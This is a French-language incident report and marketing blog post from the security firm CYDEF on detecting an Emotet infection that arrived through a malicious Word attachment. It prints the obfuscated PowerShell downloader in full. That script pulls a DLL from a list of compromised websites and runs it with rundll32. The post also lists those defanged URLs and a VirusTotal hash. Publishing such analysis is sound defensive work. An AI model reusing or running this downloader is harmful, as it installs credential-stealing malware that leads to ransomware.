Le logiciel malveillant connu sous le nom d’Emotet

est de retour en action. Maintenant, il est plus malveillant que jamais. 

On estime que  7% des organisations mondiales ont été soumises à Emotet.

L’un des clients de détection et de réponse gérées de CYDEF était l’un d’eux. Heureusement, notre équipe d’analystes a détecté une activité inhabituelle associée à l’attaque avant que des dommages ne soient causés. 

Le message suivant détaille comment le malware a été détecté et explique ce qui se serait passé si nous n’avions pas attrapé l’attaque aussi tôt que nous l’avons fait. 

Emotet contourne les défenses standard

Récemment, notre client a reçu un courriel d’un partenaire commercial de confiance. 

Le partenaire a envoyé un document inattendu, mais cela n’était pas hors de l’ordinaire. Ils échangeaient souvent des documents pour examen. Cependant, ce document ne s’ouvrait pas. Ainsi, le client a tenté de télécharger le document une deuxième fois. 

Comme vous l’avez peut-être deviné, le document n’était pas tout à fait honnête. Malheureusement, il a glissé à travers le filtre anti-spam, la couche AV, et d’autres défenses préventives. 

CYDEF détecte Emotet 

Au cours de la surveillance de routine, l’équipe de CYDEF a détecté une activité liée au programme cmd.exe: 

emotet cmd line

C’était une tentative évidente d’obfuscation. 

Après avoir identifié la brèche, CYDEF a immédiatement informé le client qu’ils avaient été touchés par une attaque de logiciels malveillants « vivant des fruits de la terre ». Nous avons recommandé qu’ils mettent la machine en quarantaine immédiatement. 

Environ 60 minutes après la première ouverture du courriel, l’ordinateur affecté a été retiré du réseau, débranché et sécurisé dans un emplacement privé. 

Désobfusquer l’Attaque 

Au cours de l’analyse détaillée pour comprendre la portée de l’incident, les analystes de CYDEF ont découvert un document Word malveillant qui a déclenché l’attaque. 

En extrayant les événements bruts avec notre outil de détection et de notre explorateur d’événements, l’équipe a identifié dans la chaîne des processus parents: 

  • Un chemin defichier d’un courrier électronique à partir d’un dossier de contenu Outlook
    • Outlook.exe était le processus parent 

Nous avons également identifié un processus enfant de la commande PowerShell résultant de l’activité CMD.exe: 

emotet child process

Le dépôt de DLL semblait être la seule méthode de persistance et le principal outil permettant aux attaquants de déchaîner le chaos. 

Déballage d’Emotet  

Afin de contenir la menace, nous devions comprendre les capacités contenues dans la DLL. 

Étant donné que la machine affectée a été débranchée, il était difficile d’analyser la souche exacte du programme malveillant présent. 

Plutôt, les analystes de CYDEF ont extrait des indicateurs de compromissions (IoC) de notre solution de détection des points de terminaison (SMART-Sentinel) et ont décodé la commande PowerShell encodée en Base 64 (une conversion en minuscules affichée dans la capture d’écran). 

seT-iTEm (‘vaRiable:2’+’kh’+’5i’) ( [tYpE](“{3}{4}{2}{1}{0}{5}” -f’.di’,’O’,’I’,’SYStEM‘,’.’,’rEcTorY‘) ) ; $wXuSr=[tYpe](“{0}{2}{3}{7}{4}{1}{5}{6}” -F’SySt‘,’o’,’Em.’,’neT.Ser’,’CeP‘,’InTmanaG‘,’ER’,’VI’) ; $Kvd6whw=$D64M + [char](33) + $U46H;$J64U=(‘U_’+’0N’); $2kh5I::”Cr`Eate`dirE`Ct`ORY“($HOME + ((‘{0}Et3q’+(‘t1’+’j’)+'{0}’+’E’+(‘qy4’+’t’)+’xq{0}’) -f [cHar]92));$B69P=(‘G’+(’11’+’G’)); ( GCi (‘VaR‘+’iABLE:wX‘+’usR‘) ).vAluE::”SecU`Ri`TYPRotO`c`oL” = (‘T’+(‘ls’+’12’));$S92J=((‘C0’+’2′)+’H’);$Zthye68 = ((‘F3’+’2′)+’O’);$U15Z=((‘W’+’82’)+’V’);$Lzh4cpx=$HOME+((‘{0}E’+’t3’+’qt’+’1’+’j{0}Eqy4’+’txq{‘+’0’+’}’) -f [CHar]92)+$Zthye68+’.d’ + ‘ll’;$R99D=((‘U4’+’4′)+’R’);$Hvvhr9p=’h’ + ‘tt‘ + ‘p’;$U5tym2l=((‘sg’+’ ‘)+’yw‘+’ a’+(‘h:’+’/’)+(‘/c’+’ov‘)+(‘is’+’ion‘)+’o’+’n’+’e’+’ne‘+(‘ss.or’+’g‘+’/ne’)+(‘w/F9’+’v/’+’!sg’)+(‘ y’+’w‘)+(‘ ah’+’s‘)+(‘:’+’//ww‘+’w.’)+’os‘+(‘h’+’isc‘+’af‘)+(‘e’+’.c‘)+’o’+’m‘+(‘/wp-a’+’dmin‘)+(‘/5’+’Dm’)+(‘/’+’!sg’)+’ y’+’w ‘+(‘a’+’hs:’+’//’)+’l’+(‘i‘+’onr‘)+(‘o’+’ckb‘+’atter’+’ie‘+’s.co’)+(‘m/’+’w’)+(‘p-s’+’n‘)+(‘a’+’ps‘)+(‘hots/’+’C’+’/’)+’!’+(‘sg’+’ yw ahs’)+(‘://’+’ww‘)+’w’+’.s‘+(‘chmu‘+’ckf‘)+(‘e’+’der‘)+(‘.’+’n’+’e’+’t/refer’)+’e’+(‘nce‘+’/ubpV/’+’!s’)+(‘g yw a’+’h:’+’//’)+(‘c’+’i‘+’rte‘+’klink‘)+(‘.’+’com/’+’F0’)+(‘xAutoC‘+’on’+’fi’+’g/’)+’1Z’+(‘b4/!s’+’g yw a’+’hs:’+’/’+’/’+’nim‘)+’bl’+’ed’+’es‘+(‘ign‘+’.’)+(‘m’+’ia‘)+(‘m’+’i/wp’)+(‘-ad’+’mi’+’n‘)+’/’+’C’+(‘/!sg yw ‘+’ah’+’://’+’xu’+’nh‘)+’o’+’ng‘+(‘.n’+’et‘+’/sys-cac‘)+’h’+’e‘+(‘/D’+’0′)+’/’).”RepL`A`CE“((‘s’+’g‘+(‘ yw‘+’ a’+’h‘)),([array](‘nj‘,’tr’),’yj’,’sc’,$Hvvhr9p,’wd’)[3]).”sP`LiT“($P4_B + $Kvd6whw + $X97D);$V43G=(‘F7’+’1J’);foreach ($Ob6xcz_ in $U5tym2l){try{(.(‘Ne’+’w-Obj’+’ec‘+’t’) SyStem.neT.WEbcLieNT).”DO`W`NlOADf`ILe“($Ob6xcz_, $Lzh4cpx);$A84S=(‘I’+(’21’+’K’));If ((.(‘Get-I’+’te‘+’m’) $Lzh4cpx).”lE`NGth” –ge 41708) {&(‘ru’+’ndl’+’l32’) $Lzh4cpx,((‘A’+’nyS‘)+’t’+(‘rin‘+’g’)).”to`stri`NG“();$Z64T=(‘B’+(’57’+’Z’));break;$C_5V=((‘N6’+’7′)+’Q’)}}catch{}}$G__F=((‘B3’+’_’)+’B’) 

Alors qu’il était encore obfusqué, le PowerShell construisait les URL et bouclait à travers la liste afin de télécharger quelque chose. 

Ensuite, l’équipe a identifié le rundll32 morcelé vers la fin. 

Afin de comprendre la source du fichier, il fallait reconstruire la partie centrale de la commande. 

Bien qu’il existe plusieurs approches pour déobfusquer du code PowerShell, nous préférons demander à l’ordinateur de faire le travail. Cette méthode est plus rapide que l’intervention manuelle et moins sujette aux erreurs. Afin de compléter cette étape, nous avons ouvert PowerShell dans une VM (Linux) et nous avons exécuté le code entre $Hvvhr9p=’h’ + ‘tt’ + ‘p’ et foreach ($Ob6xcz_ in $U5tym2l). 

Ensuite, nous avons affiché la valeur de la variable $U5tym2l pour afficher les URL à partir desquelles l’étage de télechargement récipérait la DLL: 

http:  //covisiononeness[.]org/new/F9v/

https:  //www[.]oshiscafe[.]com/wp-admin/5Dm/

https:  //lionrockbatteries[.]com/wp-snapshots/C/

https:  //www[.]schmuckfeder[.]net/reference/ubpV/

http:  //cirteklink[.]com/F0xAutoConfig/1Zb4/

https:  //nimbledesign[.]miami/wp-admin/C/

http:  //xunhong[.]net/sys-cache/D0/         

 

L’équipe a accédé aux bases de données de renseignements sur les menaces afin d’identifier les URL, mais nous nous sommes finalement appuyés sur l’accès à la DLL à partir de l’un des URL. En téléversant la DLL sur VirusTotal, nous avons identifiés l’attaque comme une infection Emotet. 

https://www.virustotal.com/gui/file/01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98/detection

À propos d’Emotet  

Emotet est l’une des infections malveillantes les plus dangereuses en circulation. 

Cela a commencé comme une méthode pour voler des informations d’identification bancaires, puis a évolué en un outil d’accès à distance que les opérateurs de rançongiciels utilisent pour gérer les infections. Emotet peut voler les mots de passe nécessaires pour compromettre plusieurs machines, effectuer des mouvements latéraux, et déposer des pièces supplémentaires de logiciels malveillants à une date ultérieure. 

Emotet est souvent associé aux infections Ryuk / Conti. 

Si vous laissez une infection Emotet suppurer, elle collecte les mots de passe pour une utilisation future, compromet toutes les machines de votre réseau, puis dépose un module de rançongiciel Ryuk. 

Exploration de Scénarios 

Que ce serait-il passé si le logiciel malveillant n’avait pas été détecté à temps? 

Si la brèche n’avait pas été détectée, on pourrait s’attendre aux retombées suivantes: 

  • Les mots de passe enregistrés sur l’ordinateur seraient compromis
  • Lesattaquants auraient accès aux sites de partenaires commerciaux et aux sites de paie
  • Machines ou réseaux seraient compromis
  • Une rançon serait exigée 

Le paiement de rançongiciel moyen pour ce type d’attaque est plus de 1 million $. 

Ransomware payents

Étant donné que notre client était de plus petite taille que l’entreprise moyenne payant la rançon dans le rapport Coverware, la demande estimée serait d’environ 100 000 dollars. 

SMART-Monitor: La Solution de Détection et de Réponse Gérée de CYDEF 

Le processus de calcul de la valeur réelle de la cybersécurité est compliqué. Après tout, de nombreuses dépenses en cybersécurité sont similaires aux dépenses d’assurance: vous payez un prime mois après mois sans avantage apparent. Puis, un jour, quelque chose se passe et vous êtes très heureux d’avoir fait l’investissement. 

100 000 $ en ransomware n’est pas comparable – pas le moindrement – au coût annuel d’une solution de protection des terminaux. Dans ce cas particulier, notre client a certainement trouvé de la valeur dans les frais annuels. 

Si vous êtes curieux de savoir comment CYDEF peut soutenir la réussite de votre, nous vous proposons une preuve de valeur gratuite de 30 jours.